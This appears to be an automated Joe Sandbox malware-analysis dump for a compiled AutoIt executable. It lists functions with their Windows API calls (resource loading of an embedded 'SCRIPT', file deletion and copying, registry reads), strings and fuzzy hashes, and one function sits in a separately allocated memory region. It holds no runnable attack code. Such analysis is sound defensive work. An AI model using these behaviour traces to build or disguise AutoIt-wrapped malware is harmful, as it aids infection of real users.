Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 0f2e486faf5d24af0a2e925ea37e7189a5f707455e94eeb98d54b97ac683231c
Instruction ID: 15ab39851642a96affcea7fba91c9852491cacda70e14869e1999713acdda84c
Opcode Fuzzy Hash: 0f2e486faf5d24af0a2e925ea37e7189a5f707455e94eeb98d54b97ac683231c
Instruction Fuzzy Hash: 00510030908249AECF11ABB4DC45FFE7BF9EB05704F0081FDF451A62A2DA709A46CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00BC4B2B

Part of subcall function 00BC7D2C: _memmove.LIBCMT ref: 00BC7D66

GetCurrentProcess.KERNEL32(?,00C4FAEC,00000000,00000000,?), ref: 00BC4BF8
IsWow64Process.KERNEL32(00000000), ref: 00BC4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BC4C45
FreeLibrary.KERNEL32(00000000), ref: 00BC4C50
GetSystemInfo.KERNEL32(00000000), ref: 00BC4C81
GetSystemInfo.KERNEL32(00000000), ref: 00BC4C8D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 1bd7cbac64b40f29c2d950a92a3c74623e67e04fd206ef67d85e5515656b74d5
Instruction ID: ff9a77f3309998bba97e1990035e731ff5532e3c4f8608e4a8fc57cc397c522c
Opcode Fuzzy Hash: 1bd7cbac64b40f29c2d950a92a3c74623e67e04fd206ef67d85e5515656b74d5
Instruction Fuzzy Hash: 9C91B43154A7C4DEC731DB6885A1BABBFE5EF26300B444DDDD0CA93A41D320EA48D769

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BC4EEE,?,?,00000000,00000000), ref: 00BC4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BC4EEE,?,?,00000000,00000000), ref: 00BC5010
LoadResource.KERNEL32(?,00000000,?,?,00BC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00BC4F8F), ref: 00BFDD60
SizeofResource.KERNEL32(?,00000000,?,?,00BC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00BC4F8F), ref: 00BFDD75
LockResource.KERNEL32(00BC4EEE,?,?,00BC4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00BC4F8F,00000000), ref: 00BFDD88

Strings

SCRIPT, xrefs: 00BC5006

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 8576f40b73d55732d2f3899292738d3fa5c0e4b5668055171ff2e949917a32ed
Instruction ID: 6dac9c083236ebcec4722e2f9ad221069707308b1769a7ab68ff027c808f90d7
Opcode Fuzzy Hash: 8576f40b73d55732d2f3899292738d3fa5c0e4b5668055171ff2e949917a32ed
Instruction Fuzzy Hash: 1F115E75200704AFD7318B65DC58F6B7BB9FBCAB51F1041ACF505C6260DBA1E8418670

Uniqueness

Uniqueness Score: -1.00%

Function 00C24696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00BFE7C1), ref: 00C246A6
FindFirstFileW.KERNELBASE(?,?), ref: 00C246B7
FindClose.KERNEL32(00000000), ref: 00C246C7

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: d697dac13cfdbce210c3c89527a554ba4e1d44fd010e20f5f718289bd9165e17
Instruction ID: 19aba25063f66e0eb129a099b08a07a1d26c096429b1a4ce4b222339c17e2f9f
Opcode Fuzzy Hash: d697dac13cfdbce210c3c89527a554ba4e1d44fd010e20f5f718289bd9165e17
Instruction Fuzzy Hash: 26E0D8394105109B42146738FC4D5EE775CAE07335F100719F935C14E0E7B059508595

Uniqueness

Uniqueness Score: -1.00%

Function 00BCE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00C0428C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 3d9d41aa438875a65f2cb00dfd4ff5a53bfbb859d7560415f6ba0f07740cf309
Instruction ID: ef1b8c5784249e061778484ea47df59cbea23f609dfc4e2a9c772ea38d6ac9a0
Opcode Fuzzy Hash: 3d9d41aa438875a65f2cb00dfd4ff5a53bfbb859d7560415f6ba0f07740cf309
Instruction Fuzzy Hash: D7A24775A04216CBCB24CF58C480FAEB7F2FB48314F2481ADE926AB251D775ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD0BBB
timeGetTime.WINMM ref: 00BD0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD0FB3
TranslateMessage.USER32(?), ref: 00BD0FC7
DispatchMessageW.USER32(?), ref: 00BD0FD5
Sleep.KERNEL32(0000000A), ref: 00BD0FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00BD105A
DestroyWindow.USER32 ref: 00BD1066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BD1080
Sleep.KERNEL32(0000000A,?,?), ref: 00C052AD
TranslateMessage.USER32(?), ref: 00C0608A
DispatchMessageW.USER32(?), ref: 00C06098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C060AC

Strings

@GUI_CTRLID, xrefs: 00C05364
@GUI_CTRLHANDLE, xrefs: 00C0540E
@TRAY_ID, xrefs: 00C05BB9
@COM_EVENTOBJ, xrefs: 00C0591A
@GUI_WINHANDLE, xrefs: 00C053B9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 2810c9f4762b141e06aba6cbcb44cf2b0edda65abdedd8cf2c7b04a6bcf6ac44
Instruction ID: ae80313f6f2e843708062516bfc1f4535cbf8eb8f99bd618550df717fb0fd288
Opcode Fuzzy Hash: 2810c9f4762b141e06aba6cbcb44cf2b0edda65abdedd8cf2c7b04a6bcf6ac44
Instruction Fuzzy Hash: A7B29B70608741DFD724DB24C884BAEBBE5FF84304F14499EE49A972A1DB71E984DF82

Uniqueness

Uniqueness Score: -1.00%

Function 00C293DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C291E9: __time64.LIBCMT ref: 00C291F3

Part of subcall function 00BC5045: _fseek.LIBCMT ref: 00BC505D

__wsplitpath.LIBCMT ref: 00C294BE

Part of subcall function 00BE432E: __wsplitpath_helper.LIBCMT ref: 00BE436E

_wcscpy.LIBCMT ref: 00C294D1
_wcscat.LIBCMT ref: 00C294E4
__wsplitpath.LIBCMT ref: 00C29509
_wcscat.LIBCMT ref: 00C2951F
_wcscat.LIBCMT ref: 00C29532

Part of subcall function 00C2922F: _memmove.LIBCMT ref: 00C29268
Part of subcall function 00C2922F: _memmove.LIBCMT ref: 00C29277

_wcscmp.LIBCMT ref: 00C29479

Part of subcall function 00C299BE: _wcscmp.LIBCMT ref: 00C29AAE
Part of subcall function 00C299BE: _wcscmp.LIBCMT ref: 00C29AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C296DC
_wcsncpy.LIBCMT ref: 00C2974F
DeleteFileW.KERNEL32(?,?), ref: 00C29785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C2979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C297AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C297BE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 6b58a2cb1ff5af5b0f50d08522acdd46406353006bc2ad2b0b5091dbe1fd2623
Instruction ID: 3ab3bc7b80c76b3108859711544c13f394163a295bc8bc27c99eb5edfe01e08b
Opcode Fuzzy Hash: 6b58a2cb1ff5af5b0f50d08522acdd46406353006bc2ad2b0b5091dbe1fd2623
Instruction Fuzzy Hash: 41C139B1D00229AADF21DF95DC85EDEB7BDEF45310F0040AAF609E7151EB709A848F65

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BC3074
RegisterClassExW.USER32(00000030), ref: 00BC309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
LoadIconW.USER32(000000A9), ref: 00BC30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101

Strings

AutoIt v3 GUI, xrefs: 00BC3090
+, xrefs: 00BC305D
0, xrefs: 00BC3056
TaskbarCreated, xrefs: 00BC30A4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 4ca8709094d098beafef30348f37682789a16bf1335ea4fa8317ba1a5d2e617d
Instruction ID: 5ce6460d6fc53de7715ade5e1d76da15f8569d68f321dc01622aef8efafdd304
Opcode Fuzzy Hash: 4ca8709094d098beafef30348f37682789a16bf1335ea4fa8317ba1a5d2e617d
Instruction Fuzzy Hash: 723143B5800309EFDB00DFA4E888B9EBBF0FB09310F14452EE580A62A0D7B94582CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BC3074
RegisterClassExW.USER32(00000030), ref: 00BC309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
LoadIconW.USER32(000000A9), ref: 00BC30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101

Strings

AutoIt v3 GUI, xrefs: 00BC3090
+, xrefs: 00BC305D
0, xrefs: 00BC3056
TaskbarCreated, xrefs: 00BC30A4

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 036f17099720900f620c28ba1391570914a943aa7d86946af7fd0b13c67653a4
Instruction ID: 49acca45c976c3c059adb437eaab3bfb4457e71c71b74638ebdc8915b7cf8e05
Opcode Fuzzy Hash: 036f17099720900f620c28ba1391570914a943aa7d86946af7fd0b13c67653a4
Instruction Fuzzy Hash: 4C21C2B5D50218AFDB00DFA4EC89B9EBBF4FB09700F00412AF914A62A0D7B54545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BC4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C862F8,?,00BC37C0,?), ref: 00BC4882

Part of subcall function 00BE074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BC72C5), ref: 00BE0771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BC7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BFECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BFED32
RegCloseKey.ADVAPI32(?), ref: 00BFED70
_wcscat.LIBCMT ref: 00BFEDC9

Strings

\Include\, xrefs: 00BC72C5
Include, xrefs: 00BFECE8, 00BFED29
\, xrefs: 00BFEDEC
Software\AutoIt v3\AutoIt, xrefs: 00BC72FE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: b4c4b8481ff8f690c923539802f919fad42d06f2bcf430aac100a747fe35381c
Instruction ID: 783094b8869e40fc4510862c1603a238695f2a50d2d6f5b485eb2c0e0944467d
Opcode Fuzzy Hash: b4c4b8481ff8f690c923539802f919fad42d06f2bcf430aac100a747fe35381c
Instruction Fuzzy Hash: 07714871408305DAC714EF25E881BAFBBE8FB94350B504A6EF555831A1EB30D949CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BC3A62
LoadCursorW.USER32(00000000,00007F00), ref: 00BC3A71
LoadIconW.USER32(00000063), ref: 00BC3A88
LoadIconW.USER32(000000A4), ref: 00BC3A9A
LoadIconW.USER32(000000A2), ref: 00BC3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC3AD2
RegisterClassExW.USER32(?), ref: 00BC3B28

Part of subcall function 00BC3041: GetSysColorBrush.USER32(0000000F), ref: 00BC3074
Part of subcall function 00BC3041: RegisterClassExW.USER32(00000030), ref: 00BC309E
Part of subcall function 00BC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
Part of subcall function 00BC3041: InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
Part of subcall function 00BC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
Part of subcall function 00BC3041: LoadIconW.USER32(000000A9), ref: 00BC30F2
Part of subcall function 00BC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101

Strings

#, xrefs: 00BC3B0D
AutoIt v3, xrefs: 00BC3B17
0, xrefs: 00BC3B06

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 6578b191f8aa7214401dc7f609ec25bdbe6ce00ed09503c36c44db538e5a0ff0
Instruction ID: 40f61d4985de1dc5e5806aede6f900c51ebb14a40c77b784506d458028767640
Opcode Fuzzy Hash: 6578b191f8aa7214401dc7f609ec25bdbe6ce00ed09503c36c44db538e5a0ff0
Instruction Fuzzy Hash: 50215A75D00308AFEB109FA4EC49B9DBFF4FB09714F0041AAF504AA2A0D7BA5654CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00BC36D2
KillTimer.USER32(?,00000001), ref: 00BC36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC372A
CreatePopupMenu.USER32 ref: 00BC373E
PostQuitMessage.USER32(00000000), ref: 00BC375F

Strings

TaskbarCreated, xrefs: 00BC3725

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: fc943b33b8bf43fd5052851ffd067f95f80ec3c3800847589d942b48565935a1
Instruction ID: e0090c800fa648921acfefe72bd69f86c993f9b85e80f04fe11fb6c9df869e04
Opcode Fuzzy Hash: fc943b33b8bf43fd5052851ffd067f95f80ec3c3800847589d942b48565935a1
Instruction Fuzzy Hash: 694149F2204105BBDF146F28EC49F7E37E5FB01B00F5441BEF606962A1DA64AE0097A9

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 00BC380D
/AutoIt3OutputDebug, xrefs: 00BC38A4
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00BC37C0
/ErrorStdOut, xrefs: 00BC388F
/AutoIt3ExecuteLine, xrefs: 00BC38B9
CMDLINE, xrefs: 00BC3834
/AutoIt3ExecuteScript, xrefs: 00BC38CE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 24df7b446a6be8d8040ad888b2c828e7f8d479bf8bb6ffec90eaa2ab61cd34d5
Instruction ID: e31e7ab51610126069c56b289b078f60e979490e28d31481bf0422b2189c20bf
Opcode Fuzzy Hash: 24df7b446a6be8d8040ad888b2c828e7f8d479bf8bb6ffec90eaa2ab61cd34d5
Instruction Fuzzy Hash: 24A129719102299ADB14EBA0CC95FEEB7F8BF14700F4444AEF416A7191DF75AA09CB60

Uniqueness

Uniqueness Score: -1.00%

Function 038D2650 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 038D2721
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 038D2947

Memory Dump Source

Source File: 00000000.00000002.1448279966.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_38d0000_150-425-2024.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
Instruction ID: 5b82450b9c0c85f576cc165beebaad34a68e2c5e2900aaf169f466e0ae029071
Opcode Fuzzy Hash: 1376b1c019e97a58b345df4903236ecb5f0b8c205347a8d20aa61bd2a2b0f564
Instruction Fuzzy Hash: 93A10474E00209EBDB14CFE4C894BEEBBB5FF48304F248599E511BB280D7759A85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

